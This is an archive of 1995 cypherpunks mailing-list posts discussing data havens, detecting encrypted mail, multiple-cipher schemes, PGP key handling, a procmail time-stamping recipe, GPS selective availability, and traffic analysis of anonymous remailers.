   extra storage pace for data, like if you dont have space on your own 
   drive?

Even when you've got enough of your own disk space, it's still subject
to failure.  Putting data in multiple places reduces the possibility
of unrecoverable catastrophe.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 12 Jan 95 09:01:09 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501121701.JAA24309@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The data haven concept as I understood it held data for public access in
some form (for sale or for free) which would be illegal in some
jurisdiction.  This might include credit information that was older than
the legal limit, libelous claims, damaging medical records, etc.
Frankly, I suspect that most usages would be directed towards reducing,
rather than increasing, individual privacy.  So this is not an area I am
interested in working towards.

The idea of offsite storage doesn't seem that helpful since you can just
store the data on your own disk in encrypted form.  Maybe if encryption
gets outlawed it would be useful, but then you can't use encryption to
communicate with the haven.

As far as remailers requiring encryption, one purpose would be to reduce
complaints by making it impossible to send some kinds of messages which
people would object to.  It would be hard to post to usenet, for example,
in a useful way.  And mail to private individuals could not contain
obvious obscenities or other objectionable material.

The problem with this is that if people become able to handle and deal
with incoming encrypted mail in a transparent way, this restriction is no
longer effective in the latter purpose.  Someone could get encrypted hate
mail and have it transparently decrypted and displayed just like normal
mail.  They will be just as upset as people are today when they get
objectionable mail from the remailer.

As far as usenet posts, if a particular decryption key were widely and
customarily used in a particular newsgroup, objectionable material
could still be widely read if encrypted with that key.  Tim May's
example of a fake encrypted post containing inflammatory material is a
good example of the heat which could occur, especially when the message
is real and not a fake one like he did.  So I don't think this
restriction would really accomplish the desired goal except perhaps in
the short term.

If the purpose is to have plausible deniability by the remailer
operator, I feel we can still get that by publicizing the remailer
software source, which has no provisions for manual filtering.  A policy
of sending only encrypted mail so that the operator can't filter would
be no more acceptable to critics of anonymity than a policy of just not
filtering at all.

Entropy checking is not adequate to detect encryption, as compressed
files have maximal entropy as well.  For these purposes, compression may
be nearly as good as encryption, except that standard compression formats
are already widely used.  An entropy checker might well pass a gif,
jpeg, or zip file, so this filter would by itself be useless to prevent
posting of unencrypted graphics.  It would probably have to be augmented
at least by some checks for these special file formats.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxVgSRnMLJtOy9MBAQF66wIA3a01avgc0jBjKXH6IMjO+6wj4tBeSUmM
ZeRl+xFZFZ4Cfsrik1ghuHXI31isiHUzrPAIVEZfFIpTw6w9T0QdSQ==
=YVRq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff A Licquia <jalicqui@prairienet.org>
Date: Thu, 12 Jan 95 07:16:58 PST
To: cypherpunks@toad.com
Subject: Knowing Something's Encrypted
Message-ID: <Pine.3.89.9501120950.B3383-0100000@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Maybe I'm missing something here.  If I am, please bonk me.

Here's a simple method for knowing that some data you received is encrypted:

1.  Require a specific method (we'll use PGP in this example).

2.  When a message comes in, check for a PGP format message.  If you 
really wanted to get fancy, you could parse the PGP header a bit to make 
sure the data was really encrypted.

It's true that this isn't "cryptographic" in the sense of testing the 
ciphertext itself, but it should work for the practical goal of enforcing 
a "must be encrypted" rule.

----------------------------------------------------------------------
Jeff Licquia (lame .sig, huh?)   |   Finger for PGP 2.6 public key
jalicqui@prairienet.org          |   Me?  Speak for whom?  You've got
licquia@cei.com (work)           |     to be kidding!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 12 Jan 95 06:20:29 PST
To: Brad Parsons <parsons@bga.com>
Subject: Re: CBS/C.Chung Plan Hit Job on Internet? (fwd)
In-Reply-To: <Pine.3.89.9501120547.A11756-0100000@ivy.bga.com>
Message-ID: <Pine.SUN.3.91.950112091617.4507C-100000@riemann.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Brad Parsons wrote:

> From: Skip Leuschner <skipl@pacifier.com>

> I see C.Chung's program as one of the first vollies in a new phase of a 
> TV/print media project.

> Internet and talk radio emerged as political forces in the '94 
> election.  If political influence by the media is a zero-sum game, as I 
> believe it is, then the TV and print media must look to their own 
> survival by trying to discredit or regulate their talk radio/internet 
> competition.

Clearly.  I think Time magazine, as they come onto the Internet, is 
realizing that the culture here does not take well to bogus and 
misleading journalism.  The Time reporter who wrote the article on the 
modern militia movement in the US asked on talk.politics.guns what people 
thought about his article - oh my, you've never seen such a flamefest!  
Not to mention the immense amount of pro-firearm opinions on the Time WWW 
talkback area.  For a magazine which has publically announced that they 
are anti-RKBA, I think they are viewing all of this with some dismay.

That is only a single issue - I think as more standard media groups come 
on-line, they will have to choose either to try to destroy the net 
through demonizing it, or change with it into an adaptive reporting 
system with traditional journalistic ethics.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Thu, 12 Jan 95 07:26:24 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com>
Message-ID: <Pine.3.89.9501120934.B24527-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Jan 1995, Dale Harrison wrote:
> >
> >A practical system would cut out a notch at 6/8 for ASCII armor, which
> >would make approximation techniques a bit tricky.  More practical is
> >just to detect ASCII armor with a regular expression recognizer and
> >de-armor it before the entropy check.
> >
> >Eric
> >
> >
> Won't work!  You can always embed an encrypted message in what 'looks' 
> like plaintext.  A trivial example: Encrypt a message with a caesar 
> cypher, then build a story where the first char of each word maps to 
> each subsequent char from the encrypted text.  At the cost of expanding 
> the size of the message by a factor of 5 to 10 you've hidden the 
> encrypted message in what looks like a letter to your mother (or a news 
> story in the NY Times, etc.)  This is old technique.
> 
> Dale H.

But Dale, hat doesn't matter much.  the user is then going otu of his way 
tpo get rejected.  The data haven would be knwon to it's users to require 
encrypted text, and a user who did the scheme you outline above would 
only be succeding in getting himself rejected.  I mean it's nothe 
operators fault he decided to be snazzy and put iit in plaintext when it 
was known to be required to be encrypted, as in knowingly encrypted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Thu, 12 Jan 95 07:36:14 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <Pine.3.89.9501120925.C24527-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Censored Girls Anonymous wrote:

> 
> 1. You have what I want or need.
> 2. In order for me to let you store it, I will give it to you
>    anyway you wish to get it.
> 3. I will let you do anything to the data you wish, so long as I  
>    get it back intact.

why would you give the haven owner free run?  I mean naturally he does 
have free run with your data once he gets it, but a matter of trust, and 
encryption protects you marginally.

> 4. It is no concern (only idle curiosity maybe) where the data is parked.

it matters alot too me, that's the security of the dat, what if your data 
is sem top secret plan to bomb the pentagon, and you are using the data 
haven to distibute to your band of anonymous terrorists, I am sure you 
woudln't want your data stored ona  public access Unix system, or in 
plaintext.

> 5. I would expect to pay money for the safekeeping of my data.

you casn do this a number of ways if the datahaven is turned into a data 
broker, i can pay you for good data otehr would be willing to 
buy(Blacknet anyone?) or you could pay me for access to data, or for safe 
secure storage and anon transfer of data to other users.

> 6. I would expect the longer you hold the data, the more it will cost.
> 7. The only thing I am counting on is the data's timely retrieval.
> 8. Welcome to the world of data "coatchecking".
> 
> Why make it more complex than this?

because it is if you want security, and also to bring in money if that is 
a motive.

> For whether it's encrypted to the nth degree, or parked in a plain brown
> wrapper in a massive unix box somewhere, as long as I the haven manager,
> return the data in a safe, timely, uncorrupted manner, I've done my duty.
>
well what would be thepurpose of this data haven you propose except as a 
extra storage pace for data, like if you dont have space on your own 
drive?  Your leaving out anon drop boxes, data brokering, or the data 
haven serving as a center for black markets.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 06:26:46 PST
To: craig@passport.ca
Subject: Re: Reefer madness
In-Reply-To: <m0rSIt6-0002GZC@forged.passport.ca>
Message-ID: <m0rSQc8-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: craig@passport.ca (Craig Hubley)
   Date: Thu, 12 Jan 1995 01:20:00 -0500 (EST)
   Cc: efc-talk@insight.dcss.mcmaster.ca

   Seems to me I have seen something like this cybersmut hype
   before... wasn't it called 'Reefer Madness'?

The threat is no doubt overblown, but it's not all foolishness.  My NY
State Senator is proposing to make a felony out of initiating contact
with a minor for sexual purposes.  It's illegal now, but it's only a
misdemeanor.  I spoke to Bob Penna, the legislative aide who
researched and wrote up the bill for Bill Sears.  He realizes that the
Internet cannot reasonably be censored, and that the solution is to be
able to punish people who do it (hence the felony) and to educate
parents and teachers to supervise children's online dealings (hence
the travelling road show to do just that).

No mention of "watch out if your child starts using encryption
programs" as a sign of online abuse.  Bob Penna admitted to having no
online access, so I'm sure he knows nothing about encryption.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 12 Jan 95 01:43:37 PST
To: perobich@ingr.com
Subject: Re: Storm Signals
Message-ID: <9501120943.AA03267@pero>
MIME-Version: 1.0
Content-Type: text/plain


> 
> If I were the DOD, I would set the standard GPS default to selective
> availability. After all, with SA on military receivers can still get
> fine positioning data. If someone could come up with a good reason to
> turn SA off, great, but I wouldn't leave it on otherwise.
> 
> The scenarios concerning GPS-piloted Cessnas full of nasty stuff come
> to mind, especially vis-a-vis the North Koreans. They probably don't
> have accurate IRBMs but they certainly could cobble together a
> Learjet-based delivery system.

SA is effectively cancelled out by using differential GPS
(Using a correction transmitter to send out differences
between GPS as-reported position and actual position).

However, any 'home made cruise missile' would need to
be fairly slow moving and manoevring. One of the features
of p-Code is support for 'high-dynamic' vehicles.

I've been away from the navigation field for some years,
so others may know more. Does the Russian Glonass system
have SA?

--
Richard Parratt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Thu, 12 Jan 95 07:49:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501120502.VAA29808@largo.remailer.net>
Message-ID: <199501121547.AA02187@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


> But selecting a single cipher is just as much a fixed policy as a
> randomly selected one is.  Far better to let the user pick a policy,
> both about sent and accepted ciphers.

If you do give the user control, what is an acceptable mechanical
implementation? Let's say I have a file encryptor which allows the
user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I
require the user to tell that program what cypher was used to encrypt
the file she wishes to decrypt?

Is storing the cypher type as part of the encrypted file a weakness?

-Paul

-- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 06:44:09 PST
To: cypherpunks@toad.com
Subject: good stuff
Message-ID: <m0rSQt8-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Interestingly enough, there are lots of interesting documents,
including anti-clipper screeds etc, on the New York State Education
Department's gopher.  Good stuff for political activists (as opposed
to passivists :).

gopher://unix5.nysed.gov:70/11/TelecommInfo/Reading%20Room%20-%20Points%20of%20View

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin.rock@njackn.com
Date: Thu, 12 Jan 95 08:32:00 PST
To: cypherpunks@toad.com
Subject: Pgp where?
Message-ID: <9501120952.0DVJZ00@njackn.com>
MIME-Version: 1.0
Content-Type: text/plain



I think this is the correct board to put this message on, but since there are
no messages to read here I might be wrong.  Does anyone know where to locate
the program (algorithm) Pretty Good Protection (PGP) ?  I've read about it in
the local newspaper, in Scientific American and in the alternate news message
area.  It sounds like a good encryption scheme and I would like to explore it's
possibilities.  Thanks for any assistance.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: assets@alpha.c2.org (Offshore Assets)
Date: Thu, 12 Jan 95 09:55:06 PST
To: cypherpunks@toad.com
Subject: Chain
Message-ID: <199501121752.JAA10878@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I use Hal Finney's 'Chain' a lot: it is an easy way of automatically
building a remailer chain.  But it won't PGP correctly with the Usura
and the Flame remailers because these two have e-mail addresses that 
have changed and/or are different from the addresses specified in their
public keys (Usura, for instance, is now <usura@replay.com>, but this 
is not the address given in its public key ID). 

Is there a way for me in PGP to edit and update the information contained
in the public keys of others?
I would want to add an "also known as" line for 'Chain' to spot.

   O.A.
  <assets@alpha.c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 12 Jan 95 10:04:26 PST
To: "L. Todd Masco" <cactus@seabsd.hks.net>
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501120607.BAA19021@bb.hks.net>
Message-ID: <Pine.3.89.9501120931.A15243-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


>
> >Strength is not right aspect.  Global risk is reduced, simply because
> >the aggregate cost of a breach is reduced.
 
On Thu, 12 Jan 1995, L. Todd Masco wrote:
> Isn't it?  If an attacker does not know what cipher is used and breaking
> each is computationally expensive (though not prohibitively so) doesn't
> that add extra complexity? 

The increase in strength, if each cypher was roughly equal,
is merely order n, where n is the number of cyphers.

If, as is likely, one of the cyphers required a billionfold
less power to break than the others, you have decreased
strength by an enormous factor.  

The way to increase strength is to use a cypher, such
as IDEA, which has a large key.  Key size will increase
strength by a factor of billions, not a factor of n.

Current key sizes are such that computationally expensive
attacks do not work on symmetric cyphers.  An attack has to 
be clever.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 12 Jan 95 10:09:07 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: How do I know if its encrypted?
In-Reply-To: <ab3a75370402100421a8@[132.162.201.201]>
Message-ID: <Pine.3.89.9501121007.A15243-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Jonathan Rochkind wrote:
 
> Of course, we're not just dealing with text.  So the scheme has got to be
> changed a bit so as to be able to detect unencrypted GIFs, and mu-law
> files, and as yet to be determined unknown files.  I don't know enough
> about what's being talked about to know if this entropy detecting stuff
> will generalize to non text files.

Graphics files are already compressed, so they pass the entropy 
test, but they start with a distinctive header.

The best way to stop graphics would be a volume limit per 
apparent source and per apparent destination.

To program that is a bit like hard work.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 12 Jan 95 07:25:33 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: time stamping service (again)
In-Reply-To: <Pine.SUN.3.91.950112062429.3862C-100000@eskimo.com>
Message-ID: <199501121525.KAA17530@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| Anyway, it is now running as the following procmail recipe:
| 
| :0 w
| * ^Subject: Time Stamp This Mail
| {
| PGPPASS=whateveryourpassphraseis
| :0 c w
| | (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \
| +clearsig=off) > timestamp.out
|  
| :0 a h
| | (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \
| ($SENDMAIL -t ;rm -f timestamp.lock)
| }
| 
| To use it, just send whatever you need time stamped to me with 
| the subject "time stamp this mail".
| 
| BTW, can a procmail expert explain to me why the locallockfile 
| mechanism doesn't work with this recipe?  If I use :0 w : as 
| the first line, procmail will happily ignore the locallockfile 
| flag and proceed to munge up timestamp.out, so I have to do 
| the filelocking manually.

	You need a lockfile on the :0 cw line, not on the :0 w .

:0 cw:
| pgp -fast +batchmode +force +verbose=0 +clearsig=off > timestamp.out



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Thu, 12 Jan 95 07:41:08 PST
To: cypherpunks@toad.com
Subject: Re: Pornography, What is it?
Message-ID: <199501121539.AA14480@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:29 PM 1/11/95 -0600, root wrote:

>Article XIV (1868)
>
>Sec. 1.
>
>All persons  born or naturalized in the United States, and subject to the 
>jurisdiction thereof, are citizens of the United States and of the States
>wherein they reside. No state shall make or enforce any law which shall
>abridge the privileges or immunities of citizens of the United States;
>nor shall any State deprive any person of life, liberty, or property,
>without due process of law; nor deny to any person within its jurisdiction
>the equal protection of the laws.
>
>Where in there is the protection you speak of? I see no guarantee of my 
>Constitutional rights, only of privileges and immunities as granted
>by the federal government. 

The courts have held that the term "liberty" in the XIVth Amendment includes
the liberties protected by the body of the Constitution and the other
Amendments.


DCF

- --
PGP signing encouraged by Private Idaho (for Windows Eudora) by Joel McNamara

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxVIOYVO4r4sgSPhAQHPfgP+PisOuBlvGgb96M5bjkVdIfDb2JEkb0Nb
N4Uw9FoILGtUPibEphsJbRF4GpCd8qfHJvZjP5jTCLztCwo0r/kPc4qDKYPzRpVv
EmZm2WwByOBSDqljJJAb3a7bC5b9vOEr2shr29u1apYmGl6sldvi4lTHYMjTOxI3
rUmivlpfsOc=
=kTT1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Wed, 11 Jan 95 16:01:22 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501111859.AA02457@poboy.b17c.ingr.com>
Message-ID: <Pine.SUN.3.91.950112105756.26382B-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Jan 1995, Paul Robichaux wrote:

> If I were the DOD, I would set the standard GPS default to selective
> availability. After all, with SA on military receivers can still get
> fine positioning data. If someone could come up with a good reason to
> turn SA off, great, but I wouldn't leave it on otherwise.

This gets discussed to death over on the sci.geo.satellite-nav group.
The consensus is that you don't want to advertise your intentions, but
political considerations have always overridden practicalities.

> The scenarios concerning GPS-piloted Cessnas full of nasty stuff come
> to mind, especially vis-a-vis the North Koreans. They probably don't
> have accurate IRBMs but they certainly could cobble together a
> Learjet-based delivery system.

This too gets discussed to death over on the sci.geo.satellite-nav group.
The consensus is that a car-bomb is cheaper and more reliable, and needs
nothing more than a street-directory for navigation.

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <jdwilson@gold.chem.hawaii.edu>
Date: Thu, 12 Jan 95 08:18:16 PST
To: cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm) (fwd)
Message-ID: <199501121623.LAA23964@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>From: Censored Girls Anonymous <carolb@barton.spring.com>
>To: cypherpunks@toad.com
>Subject: Re: Microsoft TrueName (tm)


>Praise Bob! The Rev. Ivan Stang's been preaching that for years!
>Long live the Slackmaster!

I wondered why one of the few registered hosts for Microsoft were called
"Bob" - now it makes sense.  (But they've got a good sized chunk of
netblks registered...)

- -NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    Also NetSurfer@sersol.com      >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxVXWioZzwIn1bdtAQFrygF+LKX95qYx46I4dr7TL5WBZd3brfu8VqcE
BDR+o9c/Vqu1XTGTNiS2Ij4JCEm/R4Dw
=CMgM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 12 Jan 95 09:13:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501121632.IAA00887@largo.remailer.net>
Message-ID: <9501121655.AA14127@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Well, it's no weaker than current systems.  PGP stores the cipher type
> in the source code: it's always IDEA.  One should allow, however, the
> cipher type to be empty alongside the data so that another tool can
> store cipher information.

Actually, a slight correction.  PGP does have an algorithm byte
for the encryption algorithm; this byte is inside the RSA block.
(It doesn't have to be RSA, either, but thats a different story).

So long as you use a public key to encrypt, you get this byte.  If
you just use PGP -c, using the current implementation, you do not
get a type byte.  Oops.

My point is that although the current implementation doesn't have
multiple encryption schemes, that doesn't mean that it can't have
them...

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Thu, 12 Jan 95 09:04:50 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <199501121709.MAA24434@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501121623.IAA00846@largo.remailer.net>,
Eric Hughes <eric@remailer.net> wrote:
>I am assuming that it's unlikely that all of the ciphers will be
>broken simultaneously.

Quick reasoning note:

For forward secrecy, it's unnecessary that the ciphers be broken
simultaneously;  just that they are broken in the span of time
between encryption and the attack.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxUnexNhgovrPB7dAQE5LwP+JYB/CW87wI8zdgaE64KHffcde/L6c7f9
nrC0AC5ljrKYgUyzDY0XFiDd5kHSp/wtwFeZeGkobihZqGnuHgh9R9wnPTgfrKM5
L+DBymQiHvT8LG+UwBCCNcRH0dDODYpvB3fJrYobvAzEfEazfuWDdYMZ/o4feBqT
r2meoZryBxE=
=8qyB
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxViPSoZzwIn1bdtAQFC4AF/aIdX8R43DwPV8sfpjzr7MBlS2dFM+kmW
MnYjcGHaSCkkyZ9XjXnJ3QWtvTFiigyF
=9w/Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Claborne, Chris" <claborne@microcosm.sandiegoca.ATTGIS.COM>
Date: Thu, 12 Jan 95 15:45:39 PST
To: "Tocher, John" <sglass@netcom.com>
Subject: San Diego CPunks Symposium
Message-ID: <2F158E27@microcosm.SanDiegoCA.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain



CPUNKS symposium  Thursday, Jan 26, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission 
Cafe & Coffee Shop" were I hope to get an update of weasel man's new 
anonymous e-mail server, "mixmaster", exchange keys, and generally shoot the 
shit.

   Don't forget to bring your public key  fingerprint.  If you can figure 
out how to get it on the back of a business card, that would be cool.

Place: The Mission Cafe & Coffee Shop
      488-9060
      3795 Mission Bl in Mission Beach.

Time:1800

Their Directions:
     8 west to Mission Beach Ingram Exit
     Take west mission bay drive
     Go right on Mission Blvd.

     On the corner of San Jose and mission blvd.
     It is located between roller coaster and garnett.
     It's kind of 40s looking building...  funky looking (their description, 
not mine)

I will be wearing a  BRIGHT PURPLE BICYCLING JACKET.  Try to be their by 
18:30 since we may move the meeting.

See you there!

Weasel man, don't forget to bring the latest info on mixmaster.
Fish man, sweep the place for bugs.
Anarchist, the FBI has already setup surveillance.
Law man, bring the logo and your e-mail address of the month :)
New guy, bring your fingerprint.

NOTE: My e-mail address, "chris.claborne@sandiegoca.attgis.com" permanently 
replaces my .ncr.com address.  Both address work for now but NCR address 
will
eventually be killed.

     2
 -- C  --

P.S.  Tell your wife/husband you are going to a symposium.  Unless she/he
looks in the dictionary, she/he won't know that your are really going to a
drinking party!

                                           ...  __o
                                          ..   -\<,
chris.claborne@sandiegoca.attgis.com      ...(*)/(*).          CI$: 
76340.2422
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Thu, 12 Jan 95 10:31:09 PST
To: cypherpunks@toad.com
Subject: Farewell for a bit
Message-ID: <199501121830.MAA09124@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


I need to work on the DH code, so I am unsubbing for a while.
Please can the cheers, allright? ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 12 Jan 95 12:56:41 PST
To: Frederic Halper <fhalper@pilot.njin.net>
Subject: Re: Reefer madness
In-Reply-To: <9501122019.AA14798@pilot.njin.net>
Message-ID: <Pine.SUN.3.91.950112124920.28789A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 12 Jan 1995, Reuben Halper (or his dad, Frederic, posing
as a kid) wrote:

> . . .
> I'm 16 years old and have been on the Internet for a little 
> more than a year and I haven't nor have I met anyone who has 
> been approached by a pedophile. . .

Ever seen a Turkish prison film, Reuben?


 S a n d y

With apologies to Peter Graves.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:01:26 PST
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: analysis of RemailerNet
Message-ID: <ab3b1da201021004aaa4@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:57 AM 01/12/95, Wei Dai wrote:
>Alice is sending mail to.  After the first day, she can
>eliminate about half of the remailer users from the list of possible
>targets, because they, like the the random user above,
>received a mail even though Alice didn't send one out during the
>collection period of that batch.  Now, since Eve can eliminate
>on average half of the list every day, Bob will be the only person left on
>that list after about (log base 2 of one million) = 20 days.
>
>Suppose Alice sent out some different numbers of cover e-mail:
[...]
>               3               log base 1 of 1,000,000 = infinity!

Yeah, I think it made sense. Let me try to rephrase what you are saying in
English rather then math, to see if it's still what you are saying.
1) Attacker Eve wants to figure out who Alice is sending mail to.
2) She can weed people out by noting 'collection periods' where Alice sends
mail, but certain people don't receive any mail, and eventually arrive at
Bob.
3) If Alice sends mail out in _ever_ collection period, perhaps just to the
bit bucket, this method won't work, because there won't be any periods
where Alice doesn't send mail out.

Hmmm. The basic idea here is simply that you should send out lots of cover
mail, at least one piece in every collection period, to prevent this kind
of attack. Best, a random number of cover pieces, but at least one every
collection period.  Several thoughts:
1) If Alice and Bob are both corresponding with many people, things get
more complicated.  I tried to model it similarly to the way you modeled
your simpler situation, but got confused quickly.  This would be a good
thing to look at.  Alice sends and receives mail to several people other
